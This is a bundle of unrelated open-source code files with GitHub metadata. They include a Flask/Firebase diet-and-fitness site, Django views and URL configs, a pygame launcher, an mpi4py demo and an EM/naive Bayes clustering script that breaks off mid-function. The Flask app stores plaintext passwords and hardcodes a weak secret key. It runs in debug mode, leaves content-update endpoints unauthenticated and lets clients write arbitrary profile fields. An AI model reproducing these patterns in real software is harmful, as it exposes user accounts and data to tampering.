name.append(recipe_detail)
try:
userId = session["logged_in"]
except KeyError:
return render_template("recipe.html", name=name)
users = root.child("users/" + userId).get()
return render_template("recipe.html", name=name, user=users)
#HEALTH
@app.route("/health")
def health():
database_recipes = root.child('recipe').get()
database_workout = root.child('workout').get()
try:
userId = session["logged_in"]
except KeyError:
return render_template("health.html", namer=database_recipes, name1=database_workout)
users = root.child("users/" + userId).get()
return render_template("health.html", namer=database_recipes, name1=database_workout, user=users)
@app.route("/updateToFirebase")
def updateToFirebase():
DPS = request.args.get("bmis")
print(DPS)
try:
userId = session["logged_in"]
except KeyError:
return jsonify(False)
users = root.child("users/" + userId)
users.update({"BMIgraph": DPS})
return jsonify(True)
#FUN
@app.route("/fun")
def fun():
try:
userId = session["logged_in"]
except KeyError:
return render_template("fun.html", cha1=-2, cha2=-2, cha3=-2)
users = root.child("users/"+userId).get()
if "challenge1" in users:
cha1 = users["challenge1"]
else:
cha1 = -1
if "challenge2" in users:
cha2 = users["challenge2"]
else:
cha2 = -1
if "challenge3" in users:
cha3 = users["challenge3"]
else:
cha3 = -1
return render_template("fun.html", cha1=cha1, cha2=cha2, cha3=cha3, user=users)
@app.route("/achievement4")
def achievement4():
processList = request.args.get("list")
    print(processList)
    # a Flask view must return a response; echo the payload back as JSON
    return jsonify(processList)
@app.route("/userScoreProcess")
def userScoreProcess():
processScore = request.args.get("userScore")
questionNum = request.args.get("Qnum")
try:
userId = session["logged_in"]
except KeyError:
return jsonify(-2)
user_db = root.child("users/"+userId)
userInfo = user_db.get()
if not("challenge"+questionNum in userInfo):
user_db.update({"challenge" + questionNum: processScore})
elif userInfo["challenge"+questionNum] > processScore:
return jsonify(userInfo["challenge"+questionNum])
user_db.update({"challenge"+questionNum : processScore})
return jsonify(processScore)
#COMMUNITY
@app.route('/community')
def community():
try:
adminID = session["logged_in_admin"]
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("community.html")
users = root.child("users/" + userId).get()
return render_template("community.html", user=users)
adminData = root.child("admins/" + adminID).get()
return render_template("community.html", admin=adminData)
#Credit to Sugianto
@app.route('/community/announcements', methods=['GET'])
def announcements():
postsA = root.child("announcements").get()
if postsA == None:
noNews = 'There are no current announcements.'
else:
announcements = []
for i in postsA:
postDetail = postsA[i]
user_announcement = postDetail['announcement']
announcements.append(user_announcement)
try:
adminID = session["logged_in_admin"]
adminData = root.child("admins/" + adminID).get()
except KeyError:
try:
userId = session["logged_in"]
users = root.child("users/" + userId).get()
except KeyError:
if postsA == None:
return render_template('announcements.html', noNews=noNews)
else:
return render_template('announcements.html', announcement=announcements)
if postsA == None:
return render_template("announcements.html", noNews=noNews, user=users)
else:
return render_template("announcements.html", announcement=announcements, user=users)
if postsA == None:
return render_template("announcements.html",noNews=noNews, admin=adminData)
else:
return render_template("announcements.html",announcement=announcements, admin=adminData)
@app.route('/community/general')
def general():
try:
userId = session["logged_in"]
users = root.child("users/" + userId).get()
except KeyError:
users = None
posts = root.child("posts").get()
if posts == None:
noPosts = 'There are no current posts.'
if users != None:
return render_template('general.html', generals=noPosts, user=users)
else:
return render_template('general.html', generals=noPosts)
titles = []
for i in posts:
postDetail = posts[i]
user_title = postDetail['title']
titles.append(user_title)
if users != None:
return render_template("general.html", title=titles, user=users)
else:
return render_template("general.html", title=titles)
@app.route('/community/recipes')
def recipes():
try:
userId = session["logged_in"]
users = root.child("users/" + userId).get()
except KeyError:
users = None
postsR = root.child('user_recipes').get()
if postsR == None:
noPostsR = 'There are no current recipes.'
if users != None:
return render_template('recipes.html', recipes=noPostsR, user=users)
else:
return render_template('recipes.html', recipes=noPostsR)
names = []
for i in postsR:
postRDetail = postsR[i]
user_name = postRDetail['name']
names.append(user_name)
if users != None:
return render_template('recipes.html', name=names, user=users)
else:
return render_template('recipes.html', name=names)
@app.route('/community/announcements/<announcement_url>', methods=['GET','POST'])
def append3(announcement_url):
postsA = root.child("announcements").get()
admins = root.child('admins').get()
for i in postsA:
announcement_detail = postsA[i]
if announcement_detail['announcement'] == announcement_url:
posterA = admins[announcement_detail['databaseid']]
announced = announcement_detail['announcement']
contented = announcement_detail['content']
i = i
comments = announcement_detail["comments"]
break
postId = announcement_detail['databaseid']
user = root.child('users').get()
try:
adminID = session["logged_in_admin"]
admin = root.child("admins/" + adminID).get()
except KeyError:
try:
userId = session["logged_in"]
except KeyError:
return render_template("append3.html",alluser=user, i=i, comments=comments, posterA=posterA, announced=announced, contented=contented, postID=postId)
users = root.child("users/" + userId).get()
return render_template("append3.html",alluser=user, i=i, comments=comments, userID=userId, posterA=posterA, announced=announced, contented=contented, user=users, postID=postId)
return render_template("append3.html",alluser=user, i=i, comments=comments, posterA=posterA, announced=announced, contented=contented, postID=postId, admin=admin)
#@app.route('/community')
#def community():
# try:
# adminID = session["logged_in_admin"]
# except KeyError:
# try:
# userId = session["logged_in"]
# except KeyError:
# return render_template("community.html")
# users = root.child("users/" + userId).get()
# return render_template("community.html", user=users)
# adminData = root.child("admins/" + adminID).get()
# return render_template("community.html", admin=adminData)
@app.route('/addComment3')
def addComment3():
try:
userId = session["logged_in"]
except KeyError:
return jsonify(False)
processComment = request.args.get("comment")
processUserPostsID = request.args.get("posterAID")
processUserID = request.args.get("userID")
post_db = root.child('announcements/' + processUserPostsID + "/comments")
post_db.push({
"userID" : processUserID,
"comment" : processComment,
    })
    return jsonify(True)
@app.route("/announcementUpdate")
def announcementUpdate():
announcement = request.args.get("announcement")
content = request.args.get("content")
posterA = request.args.get("posterA")
articles = root.child("announcements/" + posterA)
articles.update({
"announcement": announcement,
"content": content,
})
return jsonify()
@app.route('/community/general/<title_url>', methods=['GET','POST'])
def append(title_url):
posts = root.child("posts").get()
user = root.child('users').get()
for i in posts:
user_details = posts[i]
if user_details['title'] == title_url:
poster = user[user_details['databaseid']]
titled = user_details['title']
texted = user_details['text']
i = i
comments = user_details["comments"]
break
postId = user_details['databaseid']
try:
userId = session["logged_in"]
except KeyError:
return render_template("append.html",alluser=user, i=i, comments=comments, poster=poster, titled=titled, texted=texted, postID=postId)
users = root.child("users/" + userId).get()
return render_template("append.html",alluser=user, i=i, comments=comments, userID=userId, poster=poster, titled=titled, texted=texted, user=users, postID=postId)
@app.route('/addComment2')
def addComment2():
try:
userId = session["logged_in"]
except KeyError:
return jsonify(False)
processComment = request.args.get("comment")
processUserPostsID = request.args.get("posterID")
processUserID = request.args.get("userID")
post_db = root.child('posts/' + processUserPostsID + "/comments")
post_db.push({
"userID" : processUserID,
"comment" : processComment
})
return jsonify(True)
@app.route("/generalUpdate")
def generalUpdate():
title = request.args.get("title")
text = request.args.get("text")
poster = request.args.get("poster")
articles = root.child("posts/" + poster)
articles.update({
"title": title,
"text": text,
})
return jsonify()
@app.route('/community/recipes/<name_url>')
def append2(name_url):
postsR = root.child('user_recipes').get()
user = root.child('users').get()
for i in postsR:
user_details = postsR[i]
if user_details['name']== name_url:
posterR = user[user_details['databaseid']]
named = user_details['name']
typed = user_details['type']
prep_timed = user_details['prep_time']
cooking_timed = user_details['cooking_time']
caloried = user_details['calories']
ingrediented = user_details['ingredients']
reciped = user_details['recipes']
i=i
comments = user_details["comments"]
break
postId = user_details['databaseid']
try:
userId = session["logged_in"]
except KeyError:
return render_template('append2.html',alluser=user,i=i, comments=comments, posterR=posterR, named=named, typed=typed, prep_timed=prep_timed, cooking_timed=cooking_timed, caloried=caloried, ingrediented=ingrediented, reciped=reciped, postID=postId)
users = root.child('users/' + userId).get()
return render_template('append2.html',alluser=user,i=i, comments=comments, userID=userId, posterR=posterR, named=named, typed=typed, prep_timed=prep_timed, cooking_timed=cooking_timed, caloried=caloried, ingrediented=ingrediented, reciped=reciped, user=users, postID=postId)
@app.route('/addComment')
def addComment():
try:
userId = session["logged_in"]
except KeyError:
return jsonify(False)
processComment = request.args.get("comment")
processUserRecipesID = request.args.get("posterRID")
processUserID = request.args.get("userID")
post_db = root.child('user_recipes/' + processUserRecipesID + "/comments")
post_db.push({
"userID" : processUserID,
"comment" : processComment
})
return jsonify(True)
@app.route("/recipeUpdate")
def recipeUpdate():
name = request.args.get("name")
type = request.args.get("type")
prep_time = request.args.get("prep_time")
cooking_time = request.args.get("cooking_time")
calorie = request.args.get("calorie")
ingredients = request.args.get("ingredients")
recipe = request.args.get("recipe")
posterR = request.args.get("posterR")
articles = root.child("user_recipes/" + posterR)
articles.update({
"name": name,
"type": type,
"prep_time": prep_time,
"cooking_time": cooking_time,
"calorie": calorie,
"ingredients": ingredients,
"recipe": recipe,
})
return jsonify()
@app.route('/community/general/post', methods=['POST', 'GET'])
def post():
post = Post(request.form)
try:
userId = session["logged_in"]
if request.method == 'POST':
title = post.title.data
text = post.text.data
posts = postObj(title, text)
post_db = root.child('posts')
post_db.push({
'databaseid': userId,
"comments": "",
'title': posts.get_title(),
'text': posts.get_text(),
})
return redirect(url_for("general"))
except KeyError:
return render_template("post.html", post=post)
users = root.child("users/" + userId).get()
return render_template("post.html", post=post, user=users)
@app.route('/community/announcements/post', methods=['POST', 'GET'])
def post_announcements():
postA = Announcement(request.form)
admin = session["logged_in_admin"]
if request.method == 'POST':
announcement = postA.announcement.data
content = postA.content.data
postAs = announcementsObj(announcement, content)
postA_db = root.child('announcements')
postA_db.push({
'databaseid': admin,
"comments": "",
'announcement': postAs.get_announcement(),
'content': postAs.get_content(),
})
return redirect(url_for("announcements"))
return render_template("post_announcements.html", postA=postA, admin=admin)
@app.route('/community/recipes/post_recipe', methods=['POST', 'GET'])
def post_recipe():
postR = User_recipe(request.form)
try:
userId = session["logged_in"]
if request.method == 'POST':
name = postR.name.data
type = postR.type.data
prep_time = postR.prep_time.data
cooking_time = postR.cooking_time.data
calories = postR.calories.data
ingredients = postR.ingredients.data
recipes = postR.recipes.data
postsR = recipeObj(name, type, prep_time,cooking_time, calories, ingredients, recipes)
postR_db = root.child('user_recipes')
postR_db.push({
'databaseid' : userId,
"comments" : "",
'name': postsR.get_name(),
'type': postsR.get_type(),
'prep_time': postsR.get_prep_time(),
'cooking_time': postsR.get_cooking_time(),
'calories': postsR.get_calories(),
'ingredients': postsR.get_ingredients(),
'recipes': postsR.get_recipes(),
})
return redirect(url_for("recipes"))
except KeyError:
return render_template('post_recipe.html', postR=postR)
users = root.child('users/' + userId).get()
return render_template("post_recipe.html", postR=postR, user=users)
@app.route('/community/contactus', methods=['POST', 'GET'])
def contactus():
    # handle contact form submission
contact = Contact(request.form)
if request.method == 'POST':
email = contact.email.data
subject = contact.subject.data
message = contact.message.data
contacts = contactObj(email, subject, message)
contact_db = root.child('messages')
contact_db.push({
'email': contacts.get_email(),
'subject': contacts.get_subject(),
'message': contacts.get_message(),
})
return redirect(url_for('contactus'))
    # render the form, attaching user context when logged in
try:
userId = session["logged_in"]
except KeyError:
return render_template("contactus.html", contact=contact)
users = root.child("users/" + userId).get()
return render_template("contactus.html", contact=contact, user=users)
@app.route('/community/faq')
def faq():
try:
userId = session["logged_in"]
except KeyError:
return render_template("faq.html")
users = root.child("users/" + userId).get()
return render_template("faq.html", user=users)
#LOGIN
@app.route("/login", methods=["POST","GET"])
def login():
session.pop("logged_in", None)
session.pop("logged_in_admin", None)
form = LoginForm(request.form)
regform = RegisterForm(request.form)
users = root.child("users").get()
admins = root.child("admins").get()
if request.method == "POST" and form.adminlogin.data:
username = form.adminusername.data
password = form.adminpassword.data
for admin in admins:
adminDetail = admins[admin]
if adminDetail["username"] == username and adminDetail["password"] == password:
session["logged_in_admin"] = admin
return redirect(url_for("home"))
error = "Please check your Username and Admin Password given."
return render_template("login.html", form=form, regform=regform, checkuser=users, error=error)
if request.method == "POST" and form.login.data:
username = form.username.data
password = form.password.data
for userid in users:
userDetail = users[userid]
if userDetail["username"] == username and userDetail["password"] == password:
session["logged_in"] = userid
return redirect(url_for('home'))
error="Please check your Username and Password."
return render_template("login.html", form=form, regform=regform, checkuser=users, error=error)
elif request.method == "POST" and regform.register.data:
username = regform.username.data
firstname = regform.firstname.data
lastname = regform.lastname.data
password = regform.password.data
user = RegisterObject(username, firstname, lastname, password)
user_db = root.child("users")
user_db.push({
"username": user.get_username(),
"firstname": user.get_firstname(),
"lastname": user.get_lastname(),
"password": user.get_password(),
"displaypicture": "/static/images/display_pic.png",
"displaypicturecolor": "#FF8C00"
})
return render_template("login.html", form=form, regform=regform, checkuser=users)
return render_template("login.html", form=form, regform=regform, checkuser=users)
#PROFILE
@app.route("/profile", methods=["POST","GET"])
def profile():
try:
proform = ProfileForm(request.form)
userId = session["logged_in"]
users = root.child("users/" + userId).get()
proform.firstname.data = users["firstname"]
proform.lastname.data = users["lastname"]
proform.username.data = users["username"]
if request.method == "POST" and proform.closeacc.data:
root.child("users/" + userId).delete()
return redirect(url_for('login'))
if request.method == "POST" and proform.changepassword.data:
user_db = root.child("users/" + userId)
user_db.update({"password": proform.newpassword.data})
return redirect(url_for('profile'))
return render_template("profile.html", proform=proform, user=users)
except KeyError:
return redirect(url_for("home"))
@app.route("/updatingData")
def update_data():
processProfileValue = request.args.get("value")
processProfileKey = request.args.get("key")
userId = session["logged_in"]
user_db = root.child("users/" + userId)
user_db.update({processProfileKey: processProfileValue})
users = root.child("users/" + userId).get()
return jsonify(users)
@app.route("/checkForSameUsername")
def check_sameUsername():
checkingUsername = request.args.get("checkThis")
users = root.child("users").get()
for i in users:
if users[i]["username"] == checkingUsername:
return jsonify(False)
return jsonify(True)
@app.route("/updateDP")
def update_dp():
processFilePath = request.args.get("filePath")
processColor = request.args.get("color")
userId = session["logged_in"]
user_db = root.child("users/" + userId)
user_db.update({"displaypicture": processFilePath,
"displaypicturecolor": processColor
})
return jsonify()
#OTHERS
@app.route("/privacy")
def privacy():
return render_template("privacy.html")
@app.route("/terms&conditions")
def terms_and_conditions():
return render_template("terms&conditions.html")
if __name__ == "__main__":
app.secret_key = 'iDiet123'
app.run(debug=True)
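# Example of exercising one of the JSON endpoints above from a separate
# client (a sketch; assumes the dev server is running on Flask's default
# port and that the `requests` package is installed):
#
#   import requests
#   r = requests.get('http://127.0.0.1:5000/checkForSameUsername',
#                    params={'checkThis': 'alice'})
#   print(r.json())  # True if the username is free, False otherwise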
|
[
"noreply@github.com"
] |
CherryPhil.noreply@github.com
|
63a588b38a021df99626fd7f003cdfbd4f20eaf3
|
83aa3050fe8c3467a9eb6005c5804fbab9497379
|
/search/views.py
|
501daa102802f243c3cc21ac534163fb8804bb64
|
[] |
no_license
|
igorlebovic/Mobile-Order-Placement
|
28e6ab94e5d6359c69997468e290196716addd5a
|
0064c4c96faf9d5a53769d4ec179f9c96bbf1070
|
refs/heads/master
| 2016-08-03T09:35:04.184759
| 2011-03-05T07:22:59
| 2011-03-05T07:22:59
| 1,429,277
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from speeqeweb.search import search
from speeqeweb import settings
from django.utils import simplejson
from django.http import HttpResponse
from django.core import serializers
from speeqeweb.catalog.models import Product
def results(request, template_name="search/results.html"):
""" template for displaying settings.PRODUCTS_PER_PAGE paginated product results """
# get current search phrase
q = request.GET.get('q', '')
    # get current page number; default to 1 if missing or invalid
try:
page = int(request.GET.get('page', 1))
except ValueError:
page = 1
matching = search.products(q).get('products', [])
    # generate the paginator object
paginator = Paginator(matching,
settings.PRODUCTS_PER_PAGE)
try:
results = paginator.page(page).object_list
except (InvalidPage, EmptyPage):
results = paginator.page(1).object_list
search.store(request, q)
page_title = 'Search Results for: ' + q
return render_to_response(template_name, locals(), context_instance=RequestContext(request))
|
[
"igor.lebovic@gmail.com"
] |
igor.lebovic@gmail.com
|
63c864a8581fcfaab43516b76e7ffc89d6f4cace
|
762db71e9bb66ab5821bd91eff7e0fa813f795a0
|
/code/python/echomesh/remote/Transfer.py
|
d7504dc059f9bbdcfba3ac617fd24c7d8a0271ed
|
[
"MIT"
] |
permissive
|
huochaip/echomesh
|
0954d5bca14d58c0d762a5d3db4e6dcd246bf765
|
be668971a687b141660fd2e5635d2fd598992a01
|
refs/heads/master
| 2020-06-17T20:21:47.216434
| 2016-08-16T16:49:56
| 2016-08-16T16:49:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,327
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import os.path
import shutil
import six
from echomesh.remote import RemoteRegistry
from echomesh.base import Settings
from echomesh.base import MakeDirs
from echomesh.base import Path
def transfer(_, **data):
backup_directory = os.path.join(Path.data_path(), '.echomesh-xfer')
try:
shutil.rmtree(backup_directory)
except OSError:
pass
directories = data.get('directories', [])
if '' in directories:
directories = os.listdir(Path.data_path())
for directory in directories:
parent = os.path.dirname(os.path.join(backup_directory, directory))
MakeDirs.parent_makedirs(parent)
shutil.move(os.path.join(Path.data_path(), directory), parent)
for f, value in six.iteritems(data.get('files')):
fname = os.path.join(Path.data_path(), f)
MakeDirs.parent_makedirs(fname)
with open(fname, 'w') as o:
o.write(value['contents'])
os.utime(fname, (value['atime'], value['mtime']))
if Settings.get('execution', 'delete_backups_after_transfer'):
try:
shutil.rmtree(backup_directory)
except:
pass
HELP = """transfer: transfer all your files to all the other echomesh nodes.
"""
|
[
"tom@swirly.com"
] |
tom@swirly.com
|
a84676b6ba6ffdf94410ce0eb6e19ab89b6b5c66
|
6aede685b491634442e7113041e3dd33d8e59465
|
/main.py
|
9720641276b0cdef043f423029aabd98c4e023d6
|
[] |
no_license
|
jakubthedeveloper/PoznajmyPygame
|
611297ad375bdd08491c452cff7b292e5d1751ae
|
8b88632f8f0b8d460ea514b27ca37d70bbb3c843
|
refs/heads/master
| 2023-01-06T08:38:27.105261
| 2020-10-31T15:51:00
| 2020-10-31T15:51:00
| 114,876,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 748
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import pygame
import game
import menu
from levels import *
pygame.init()
window_caption = "Poznajmy PyGame"
max_display_height = int(pygame.display.Info().current_h * 0.9)
display_size = (1024, min(768, max_display_height))
fullscreen = False
def getLevel(level_name):
return globals()[level_name].Level(pygame)
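# e.g. if menu.Menu().run() returns "level01", this looks up the module of
# that name pulled in by `from levels import *` (assuming the levels package
# exposes its level modules) and instantiates its Level class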
if __name__ == "__main__":
os.environ['SDL_VIDEO_CENTERED'] = '1'
pygame.init()
pygame.display.set_caption(window_caption)
pygame.display.set_mode(display_size, pygame.FULLSCREEN if fullscreen else 0)
while True:
level_name = menu.Menu().run()
level = getLevel(level_name)
game.Game(level).run()
pygame.quit()
|
[
"jakub.krysakowski@gmail.com"
] |
jakub.krysakowski@gmail.com
|
12c3686889b5f2939251bba96d1dae41d0888969
|
9f412a0a84ecf07193830d5ae90079171a1f7bf6
|
/backend/plain_pond_27687/urls.py
|
4eb6d901ddc72cbc259a6a96609d240f76cc2b4d
|
[] |
no_license
|
crowdbotics-apps/plain-pond-27687
|
1a677c88e259ee68fbb44a7162903e297adbdb7d
|
006d431f84180c9e95b0f70ebcd6df6b52faeb23
|
refs/heads/master
| 2023-05-09T12:44:59.849288
| 2021-06-02T18:49:43
| 2021-06-02T18:49:43
| 373,271,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,223
|
py
|
"""plain_pond_27687 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic.base import TemplateView
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("modules/", include("modules.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
]
admin.site.site_header = "Plain Pond"
admin.site.site_title = "Plain Pond Admin Portal"
admin.site.index_title = "Plain Pond Admin"
# swagger
api_info = openapi.Info(
title="Plain Pond API",
default_version="v1",
description="API documentation for Plain Pond App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
urlpatterns += [path("", TemplateView.as_view(template_name='index.html'))]
urlpatterns += [re_path(r"^(?:.*)/?$",
TemplateView.as_view(template_name='index.html'))]
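# note: the catch-all re_path above must remain the last pattern; any route
# appended after it would be shadowed, which is why the API, admin, and docs
# routes are registered first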
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
a487d92d7aa1f17f5cb3a204ee05ef92969e8474
|
edc3be3343f1e95f87f5fa184dccbd2959a2a49d
|
/opt/mpi4py-3.1.1/demo/futures/run_primes.py
|
34dc986523b7ae1d197fc3c09fcb2d25b203e440
|
[] |
no_license
|
JBlaschke/docker-mpich
|
2bdeca1d4006688d55ad8eb9e696c3c6a0adab7b
|
938d0608b02cced4881ec8aba27d24cea0c2319b
|
refs/heads/master
| 2023-08-02T03:38:09.571629
| 2021-09-12T18:58:44
| 2021-09-12T18:58:44
| 405,728,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 694
|
py
|
from __future__ import print_function
import math
from mpi4py.futures import MPIPoolExecutor
PRIMES = [
112272535095293,
112582705942171,
112272535095293,
115280095190773,
115797848077099,
117450548693743,
993960000099397,
]
def is_prime(n):
    if n < 2:
        return False
    if n == 2:
        return True
    if n % 2 == 0:
        return False
sqrt_n = int(math.floor(math.sqrt(n)))
for i in range(3, sqrt_n + 1, 2):
if n % i == 0:
return False
return True
def test_primes():
with MPIPoolExecutor(4) as executor:
for number, prime in zip(PRIMES, executor.map(is_prime, PRIMES)):
print('%d is prime: %s' % (number, prime))
if __name__ == '__main__':
test_primes()
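# Typical launch for MPIPoolExecutor (per the mpi4py.futures docs): run the
# script under MPI with the futures runner, e.g.
#   mpiexec -n 5 python -m mpi4py.futures run_primes.py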
|
[
"jpblaschke@lbl.gov"
] |
jpblaschke@lbl.gov
|
f9e5d442551f8f212b8868c52d63b8be0505383d
|
4563ae15d16d136d2b18c6bfb9ca148388f3c74c
|
/algorithms/stack.py
|
2c4d7a0842d8a1b87f2ab22a5eaa31398d57540f
|
[] |
no_license
|
EmmanuelSHS/LeetCode
|
47453a8e6f9ce52f2ab917d006ecd90c02bdf094
|
f0d4d581fd0c6ea57fc7fa969677f04c8b076284
|
refs/heads/master
| 2021-01-10T17:11:01.974793
| 2016-12-15T17:39:15
| 2016-12-15T17:39:15
| 44,061,585
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 991
|
py
|
#!/usr/bin/env python
# coding=utf-8
import copy
class stack:
def __init__(self, list, maxlen):
self.top = len(list) - 1
self.maxlen = maxlen
self.list = copy.deepcopy(list)
def empty(self):
        return self.top == -1
def push(self, x):
if isinstance(x, int):
if self.top + 2 <= self.maxlen:
self.list.append(x)
self.top += 1
else:
raise "Error: Stack Overflow!"
else:
raise "Error: Only int number is acceptable!"
def pop(self):
if self.top == -1:
raise "Error: Stack Underflow!"
else:
self.top -= 1
return self.list.pop()
def getstack(self):
return self.list
def gettop(self):
return self.top
if __name__ == '__main__':
s = stack([], 10)
    print(s.getstack())
    print(s.gettop())
    s.push(1); print(s.getstack())
    print(s.pop())
|
[
"clochard93@gmail.com"
] |
clochard93@gmail.com
|
ababa1433d212f092af98106f6265a8723cc3983
|
879095825d8079a10d0bb49670a07a41a04fd78b
|
/OnlineShopping/products/urls.py
|
1430056e7332dd4364b528ade260ad83316277bd
|
[] |
no_license
|
raviteja-peri/OnlineShopping
|
317c3431b9d33e980425d2c552f9a9526bd26a97
|
117c1ee57102864850f1f5938c391756efea929f
|
refs/heads/master
| 2020-07-15T02:36:22.865797
| 2019-08-30T21:40:27
| 2019-08-30T21:40:27
| 205,460,057
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from django.urls import path
from products.views import product_list_by_category, ProductDetail, Search, product_list
app_name = 'products'
urlpatterns = [
    path('', product_list, name='productlist'),
    path('category/<slug>/', product_list_by_category, name='products'),
    path('search/', Search, name='search'),
    path('products/<pk>/', ProductDetail, name='single_product')
]
|
[
"periv@uwindsor.ca"
] |
periv@uwindsor.ca
|
4c9b3c312ed1bff80ca7cc04789ddc6fd171bd8f
|
f45211c864d23f89326271c8ca0ec7b0b53b356a
|
/Naive_Bayesian_EM/k_7_com_features.py
|
ab97488d246066dc1fa7b11670ea5787030a48ef
|
[] |
no_license
|
KEVINYZY1/Model-Alan
|
37d9223680831da5794c121d5738464422b358f8
|
bdb32d0837cddfcd8766525d95c53193a27dc61c
|
refs/heads/master
| 2020-03-30T01:51:23.154586
| 2017-05-19T03:21:01
| 2017-05-19T03:21:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,345
|
py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
import numpy as np
from scipy.stats import multivariate_normal
from sklearn.mixture import GMM
#from mpl_toolkits.mplot3d import Axes3D
#import matplotlib as mpl
#import matplotlib.pyplot as plt
from sklearn.cross_validation import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import LogisticRegression
import random
import math
import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
# mpl.rcParams['font.sans-serif'] = [u'SimHei']
# mpl.rcParams['axes.unicode_minus'] = False
K = 7
def pre_deal_data(data1,data2):
    # discretize the continuous data (percentile bucketing per column)
for i in range(len(data1[0])):
        a = np.array([x[i] for x in data1])  # take column i
sp = np.percentile(a,[x*5 for x in range(21)])
for j in range(len(data1)):
# t = data1[j][i]
flag = 0
for k in range(1,len(sp)):
if(data1[j][i] <= sp[k]):
flag = k
break
# data1[j][i] = k + i*100
data1[j][i] = flag + i*100
for j in range(len(data2)):
# t = data2[j][i]
flag = 0
for k in range(1,len(sp)):
if(data2[j][i] <= sp[k]):
flag = k
break
# data2[j][i] = k + i*100
data2[j][i] = flag + i*100
def change(y_hat, y):
    # align cluster labels with true labels: e.g. cluster 1 may correspond to true class 3
lable = np.array([[0]*(K+1)]*(K+1))
# print(lable.shape)
for i in range(len(y)):
lable[int(y_hat[i])][int(y[i])] += 1
z = [0]*(K+1)
# print(lable)
# tot = 0
for i in range(1,(K+1)):
y_max = 0
num_max = -1
for j in range(1,(K+1)):
if lable[i][j] > num_max:
num_max = lable[i][j]
y_max = j
z[i] = y_max
for i in range(len(y_hat)):
y_hat[i] = z[y_hat[i]]
# note: preprocessing dropped the last column
def pre(x_test, phi, pi):
    # predict on the test set with the trained model
gamma = np.array([[0.0]*K]*len(x_test))
data = x_test
for i in range(len(data)):
tot = 0.0
for k in range(K):
# gamma[i][k] = pi[k] * (phi[0][k][data[i][0]]+lamda) * (phi[1][k][data[i][1]]+lamda) * (phi[2][k][data[i][2]]+lamda)
gamma[i][k] = pi[k] * (phi[0][k][data[i][0]]) * (phi[1][k][data[i][1]]) * (phi[2][k][data[i][2]])
tot += gamma[i][k]
for k in range(K):
gamma[i][k] /= tot
y_test_hat = [0.0]*len(data)
for i in range(len(data)):
maxc = gamma[i][0]
lable = 0
for k in range(1,K):
if maxc < gamma[i][k]:
maxc = gamma[i][k]
lable = k
y_test_hat[i] = lable + 1
return np.array(y_test_hat)
def print_ans(gamma, phi, pi, data, y, x_test, y_test, n_iter):
    # compute predictions and print accuracies
y_hat = [0.0]*len(data)
for i in range(len(data)):
maxc = gamma[i][0]
lable = 0
for k in range(1,K):
if maxc < gamma[i][k]:
maxc = gamma[i][k]
lable = k
y_hat[i] = lable + 1
y_hat = np.array(y_hat)
y_test_hat = pre(x_test, phi, pi)
if n_iter % 1 ==0:
x_ = np.c_[data, y_hat.reshape(len(y_hat), 1)]
x_test_ = np.c_[x_test, y_test_hat.reshape(len(y_test_hat), 1)]
        # naive Bayes classification: multinomial
        multinomialNB(x_,y,x_test_,y_test)
        # naive Bayes classification: Gaussian
        gaussianNB(x_,y,x_test_,y_test)
logistic(x_,y,x_test_,y_test)
gmm_deal(x_,y,x_test_,y_test)
change(y_hat, y)
change(y_test_hat, y_test)
acc = np.mean(y_hat.ravel() == y.ravel())
acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
    acc_str = u'EM training accuracy: %.2f%%' % (acc * 100)
    acc_test_str = u'EM test accuracy: %.2f%%' % (acc_test * 100)
print(acc_str)
print(acc_test_str)
def gmm_deal(x,y,x_test,y_test):
gmm = GMM(n_components=7, covariance_type='full', tol=0.0001, n_iter=100, random_state=0)
gmm.fit(x)
y_hat = gmm.predict(x)
y_test_hat = gmm.predict(x_test)
print(np.min(y_test_hat, axis=0))
print(np.max(y_test_hat, axis=0))
change(y_hat, y)
change(y_test_hat, y_test)
    # accuracy needs the cluster labels aligned to the true labels first:
    # for each cluster, the majority true class among its members is taken as its label
    acc = np.mean(y_hat.ravel() == y.ravel())
    acc_test = np.mean(y_test_hat.ravel() == y_test.ravel())
    print("GMM:")
    acc_str = u'training accuracy: %.2f%%' % (acc * 100)
    acc_test_str = u'test accuracy: %.2f%%' % (acc_test * 100)
